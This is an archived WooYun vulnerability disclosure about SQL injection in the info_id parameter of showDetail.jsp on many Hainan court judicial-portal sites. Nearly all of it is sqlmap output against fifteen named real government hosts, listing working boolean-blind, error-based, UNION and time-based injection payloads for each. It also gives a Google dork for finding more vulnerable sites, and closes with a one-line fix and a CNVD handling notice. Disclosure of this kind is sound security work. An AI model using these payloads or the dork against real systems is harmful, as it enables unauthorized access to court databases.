乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-14: 细节已通知厂商并且等待厂商处理中 2015-05-19: 厂商已经确认,细节仅向厂商公开 2015-05-22: 细节向第三方安全合作伙伴开放 2015-07-13: 细节向核心白帽子及相关领域专家公开 2015-07-23: 细节向普通白帽子公开 2015-08-02: 细节向实习白帽子公开 2015-08-17: 细节向公众公开
通用型
谷歌关键字:inurl:showDetail.jsp?info_id=ps:(sqlmap用windows版本跑。)Linux版会出现一些小问题。。
#1:http://www.mlfy.gov.cn/sfpt/channel/showDetail.jsp?info_id=201309000467sqlmap identified the following injection points with a total of 49 HTTP(s) requests:---Place: GETParameter: info_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=201309000467' AND 1627=1627 AND 'UkaE'='UkaE Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: info_id=201309000467' AND 5913=CONVERT(INT,(CHAR(58)+CHAR(114)+CHAR(121)+CHAR(113)+CHAR(58)+(SELECT (CASE WHEN (5913=5913) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(98)+CHAR(102)+CHAR(104)+CHAR(58))) AND 'akzr'='akzr Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: info_id=201309000467' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(58)+CHAR(114)+CHAR(121)+CHAR(113)+CHAR(58)+CHAR(109)+CHAR(118)+CHAR(100)+CHAR(114)+CHAR(102)+CHAR(106)+CHAR(107)+CHAR(84)+CHAR(86)+CHAR(113)+CHAR(58)+CHAR(98)+CHAR(102)+CHAR(104)+CHAR(58),NULL-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: info_id=201309000467' WAITFOR DELAY '0:0:5'-----#2:http://www.lingaofayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000020201105sqlmap identified the following injection points with a total of 54 HTTP(s) requests:---Place: GETParameter: info_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=XFLOW000020201105' AND 4372=4372 AND 'pLzv'='pLzv Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: info_id=XFLOW000020201105' AND 3158=CONVERT(INT,(CHAR(58)+CHAR(112)+CHAR(116)+CHAR(118)+CHAR(58)+(SELECT (CASE WHEN (3158=3158) THEN CHAR(49) ELSECHAR(48) END))+CHAR(58)+CHAR(112)+CHAR(100)+CHAR(106)+CHAR(58))) AND 'uucC'='uucC Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: info_id=-4320' UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(112)+CHAR(116)+CHAR(118)+CHAR(58)+CHAR(84)+CHAR(85)+CHAR(100)+CHAR(72)+CHAR(112)+CHAR(69)+CHAR(106)+CHAR(70)+CHAR(114)+CHAR(100)+CHAR(58)+CHAR(112)+CHAR(100)+CHAR(106)+CHAR(58),NULL,NULL,NULL,NULL-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: info_id=XFLOW000020201105' WAITFOR DELAY '0:0:5'-----#3:http://sf.hicourt.gov.cn/sfpt/channel/showDetail.jsp?info_id=201309000467Place: GETParameter: info_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=201309000467' AND 3196=3196 AND 'QsNJ'='QsNJ Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: info_id=201309000467' AND 4760=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(117)+CHAR(113)+(SELECT (CASE WHEN (4760=4760) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(102)+CHAR(114)+CHAR(119)+CHAR(113))) AND 'mYAY'='mYAY Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: info_id=201309000467' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(120)+CHAR(117)+CHAR(113)+CHAR(73)+CHAR(65)+CHAR(110)+CHAR(80)+CHAR(77)+CHAR(111)+CHAR(118)+CHAR(102)+CHAR(101)+CHAR(103)+CHAR(113)+CHAR(102)+CHAR(114)+CHAR(119)+CHAR(113),NULL-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: info_id=201309000467' WAITFOR DELAY '0:0:5'--#4:http://www.xyfycourt.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000027201105Place: GETParameter: info_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=XFLOW000027201105' AND 1848=1848 AND 'gRxW'='gRxW Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: info_id=XFLOW000027201105' AND 9290=CONVERT(INT,(CHAR(58)+CHAR(100)+CHAR(116)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (9290=9290) THEN CHAR(49) ELSECHAR(48) END))+CHAR(58)+CHAR(99)+CHAR(122)+CHAR(108)+CHAR(58))) AND 'RvQx'='RvQx Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: info_id=XFLOW000027201105' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(58)+CHAR(100)+CHAR(116)+CHAR(112)+CHAR(58)+CHAR(108)+CHAR(73)+CHAR(72)+CHAR(118)+CHAR(102)+CHAR(121)+CHAR(108)+CHAR(67)+CHAR(117)+CHAR(67)+CHAR(58)+CHAR(99)+CHAR(122)+CHAR(108)+CHAR(58),NULL-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: info_id=XFLOW000027201105' WAITFOR DELAY '0:0:5'-----#5:http://www.lsfayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=201309000467Place: GETParameter: info_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=201309000467' AND 1179=1179 AND 'uzLK'='uzLK Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: info_id=201309000467' AND 8642=CONVERT(INT,(CHAR(58)+CHAR(117)+CHAR(110)+CHAR(103)+CHAR(58)+(SELECT (CASE WHEN (8642=8642) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(112)+CHAR(121)+CHAR(112)+CHAR(58))) AND 'oKuu'='oKuu Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: info_id=201309000467' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(58)+CHAR(117)+CHAR(110)+CHAR(103)+CHAR(58)+CHAR(101)+CHAR(121)+CHAR(78)+CHAR(107)+CHAR(87)+CHAR(115)+CHAR(112)+CHAR(113)+CHAR(119)+CHAR(113)+CHAR(58)+CHAR(112)+CHAR(121)+CHAR(112)+CHAR(58),NULL-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: info_id=201309000467' WAITFOR DELAY '0:0:5'-----#6:http://www.qionghaifayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000021201105Place: GETParameter: info_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=XFLOW000021201105' AND 5572=5572 AND 'izwn'='izwn Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: info_id=XFLOW000021201105' AND 4949=CONVERT(INT,(CHAR(58)+CHAR(117)+CHAR(112)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (4949=4949) THEN CHAR(49) ELSECHAR(48) END))+CHAR(58)+CHAR(103)+CHAR(114)+CHAR(102)+CHAR(58))) AND 'TMrT'='TMrT Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: info_id=XFLOW000021201105' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(58)+CHAR(117)+CHAR(112)+CHAR(105)+CHAR(58)+CHAR(105)+CHAR(65)+CHAR(68)+CHAR(72)+CHAR(89)+CHAR(99)+CHAR(77)+CHAR(97)+CHAR(80)+CHAR(84)+CHAR(58)+CHAR(103)+CHAR(114)+CHAR(102)+CHAR(58),NULL-- Type: AND/OR time-based blind Title: PostgreSQL > 8.1 AND time-based blind Payload: info_id=XFLOW000021201105' AND 3562=(SELECT 3562 FROM PG_SLEEP(5))AND 'kDEH'='kDEH---[17:01:29] [INFO] the back-end DBMS is PostgreSQLweb application technology: JSP#7:http://www.hndzfy.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000020201105Place: GETParameter: info_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=XFLOW000020201105' AND 1197=1197 AND 'GqXa'='GqXa Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: info_id=XFLOW000020201105' AND 6917=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(120)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (6917=6917) THEN CHAR(49) ELSECHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(118)+CHAR(103)+CHAR(58))) AND 'DIoR'='DIoR Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: info_id=-1609' UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(105)+CHAR(120)+CHAR(112)+CHAR(58)+CHAR(67)+CHAR(66)+CHAR(76)+CHAR(103)+CHAR(118)+CHAR(113)+CHAR(112)+CHAR(71)+CHAR(76)+CHAR(89)+CHAR(58)+CHAR(109)+CHAR(118)+CHAR(103)+CHAR(58),NULL,NULL,NULL,NULL-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: info_id=XFLOW000020201105' WAITFOR DELAY '0:0:5'-----#8:http://www.syzy.gov.cn/sfpt/channel/showDetail.jsp?info_id=SFDTP000001201503000651Place: GETParameter: info_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=SFDTP000001201503000651' AND 4899=4899 AND 'NiHn'='NiHn Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: info_id=SFDTP000001201503000651' AND 8619=CONVERT(INT,(CHAR(58)+CHAR(110)+CHAR(110)+CHAR(107)+CHAR(58)+(SELECT (CASE WHEN (8619=8619) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(103)+CHAR(110)+CHAR(58))) AND 'ZKfX'='ZKfX Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: info_id=SFDTP000001201503000651' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(58)+CHAR(110)+CHAR(110)+CHAR(107)+CHAR(58)+CHAR(122)+CHAR(115)+CHAR(80)+CHAR(116)+CHAR(103)+CHAR(84)+CHAR(76)+CHAR(102)+CHAR(77)+CHAR(87)+CHAR(58)+CHAR(109)+CHAR(103)+CHAR(110)+CHAR(58),NULL-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: info_id=SFDTP000001201503000651' WAITFOR DELAY '0:0:5'-----#9:http://sfpt.hkfy.gov.cn/sfpt/channel/showDetail.jsp?info_id=SFDTP000762201504000609Place: GETParameter: info_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=SFDTP000762201504000609' AND 5622=5622 AND 'fGgY'='fGgY Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: info_id=SFDTP000762201504000609' AND 1174=CONVERT(INT,(SELECT CHAR(113)+CHAR(97)+CHAR(107)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (1174=1174) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(119)+CHAR(113))) AND 'szbV'='szbV Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: info_id=-8808' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(97)+CHAR(107)+CHAR(109)+CHAR(113)+CHAR(73)+CHAR(70)+CHAR(80)+CHAR(84)+CHAR(84)+CHAR(68)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(88)+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(119)+CHAR(113),NULL-- ---#10:http://www.baishafayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000023201105Place: GETParameter: info_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=XFLOW000023201105' AND 8000=8000 AND 'CNUK'='CNUK Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: info_id=XFLOW000023201105' AND 4613=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(97)+CHAR(101)+CHAR(58)+(SELECT (CASE WHEN (4613=4613) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(101)+CHAR(101)+CHAR(58))) AND 'jetN'='jetN Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: info_id=-5114' UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(105)+CHAR(97)+CHAR(101)+CHAR(58)+CHAR(68)+CHAR(122)+CHAR(81)+CHAR(82)+CHAR(65)+CHAR(89)+CHAR(118)+CHAR(73)+CHAR(116)+CHAR(107)+CHAR(58)+CHAR(117)+CHAR(101)+CHAR(101)+CHAR(58),NULL,NULL,NULL,NULL-----#11:http://www.wzsfy.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000027201105Place: GETParameter: info_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=XFLOW000027201105' AND 3260=3260 AND 'umkV'='umkV Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: info_id=XFLOW000027201105' AND 7974=CONVERT(INT,(CHAR(58)+CHAR(122)+CHAR(106)+CHAR(118)+CHAR(58)+(SELECT (CASE WHEN (7974=7974) THEN CHAR(49) ELSECHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(114)+CHAR(116)+CHAR(58))) AND 'TxVi'='TxVi Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: info_id=XFLOW000027201105' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(58)+CHAR(122)+CHAR(106)+CHAR(118)+CHAR(58)+CHAR(118)+CHAR(104)+CHAR(113)+CHAR(115)+CHAR(74)+CHAR(81)+CHAR(85)+CHAR(67)+CHAR(115)+CHAR(67)+CHAR(58)+CHAR(108)+CHAR(114)+CHAR(116)+CHAR(58),NULL-- Type: AND/OR time-based blind Title: PostgreSQL > 8.1 AND time-based blind Payload: info_id=XFLOW000027201105' AND 7232=(SELECT 7232 FROM PG_SLEEP(5))AND 'ZuUq'='ZuUq---#12:http://www.dongfangfayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000023201105Place: GETParameter: info_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=XFLOW000023201105' AND 4256=4256 AND 'aBMu'='aBMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: info_id=XFLOW000023201105' AND 3202=CONVERT(INT,(CHAR(58)+CHAR(104)+CHAR(119)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (3202=3202) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(99)+CHAR(103)+CHAR(58))) AND 'whgB'='whgB Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: info_id=XFLOW000023201105' WAITFOR DELAY '0:0:5'-----#13:http://www.ypfy.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000023201105Place: GETParameter: info_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=XFLOW000023201105' AND 9147=9147 AND 'kicL'='kicL Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: info_id=XFLOW000023201105' AND 7570=CONVERT(INT,(CHAR(58)+CHAR(117)+CHAR(122)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (7570=7570) THEN CHAR(49) ELSECHAR(48) END))+CHAR(58)+CHAR(118)+CHAR(104)+CHAR(104)+CHAR(58))) AND 'nvaU'='nvaU Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: info_id=-9483' UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(117)+CHAR(122)+CHAR(100)+CHAR(58)+CHAR(100)+CHAR(65)+CHAR(81)+CHAR(82)+CHAR(115)+CHAR(70)+CHAR(103)+CHAR(110)+CHAR(73)+CHAR(114)+CHAR(58)+CHAR(118)+CHAR(104)+CHAR(104)+CHAR(58),NULL,NULL,NULL,NULL-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: info_id=XFLOW000023201105' WAITFOR DELAY '0:0:5'-----#14:http://www.chengmaifayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=SFDTP000001201501000623Place: GETParameter: info_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=SFDTP000001201501000623' AND 2766=2766 AND 'yzBo'='yzBo Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: info_id=SFDTP000001201501000623' AND 1048=CONVERT(INT,(CHAR(58)+CHAR(113)+CHAR(122)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (1048=1048) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(107)+CHAR(107)+CHAR(58))) AND 'ouIj'='ouIj Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: info_id=-1668' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(58)+CHAR(113)+CHAR(122)+CHAR(114)+CHAR(58)+CHAR(72)+CHAR(76)+CHAR(105)+CHAR(68)+CHAR(86)+CHAR(118)+CHAR(88)+CHAR(83)+CHAR(110)+CHAR(97)+CHAR(58)+CHAR(109)+CHAR(107)+CHAR(107)+CHAR(58),NULL-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: info_id=SFDTP000001201501000623' WAITFOR DELAY '0:0:5'-----#15:http://112.67.253.202/sfpt/channel/showDetail.jsp?info_id=SFDTP000001201407000583Place: GETParameter: info_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=SFDTP000001201407000583' AND 6259=6259 AND 'XMNE'='XMNE Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: info_id=SFDTP000001201407000583' AND 1970=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(104)+CHAR(116)+CHAR(58)+(SELECT (CASE WHEN (1970=1970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(114)+CHAR(102)+CHAR(122)+CHAR(58))) AND 'VPKc'='VPKc Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: info_id=-2453' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(58)+CHAR(108)+CHAR(104)+CHAR(116)+CHAR(58)+CHAR(100)+CHAR(79)+CHAR(82)+CHAR(98)+CHAR(75)+CHAR(102)+CHAR(103)+CHAR(121)+CHAR(75)+CHAR(113)+CHAR(58)+CHAR(114)+CHAR(102)+CHAR(122)+CHAR(58),NULL-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: info_id=SFDTP000001201407000583' WAITFOR DELAY '0:0:5'-----
谷歌关键字:inurl:showDetail.jsp?info_id=
禁止字符串拼接。。
危害等级:高
漏洞Rank:13
确认时间:2015-05-19 08:15
CNVD确认并复现所述情况,暂未确认软件生产厂商已经转由CNCERT下发给海南分中心,由其后续协调网站案例单位处置.
暂无
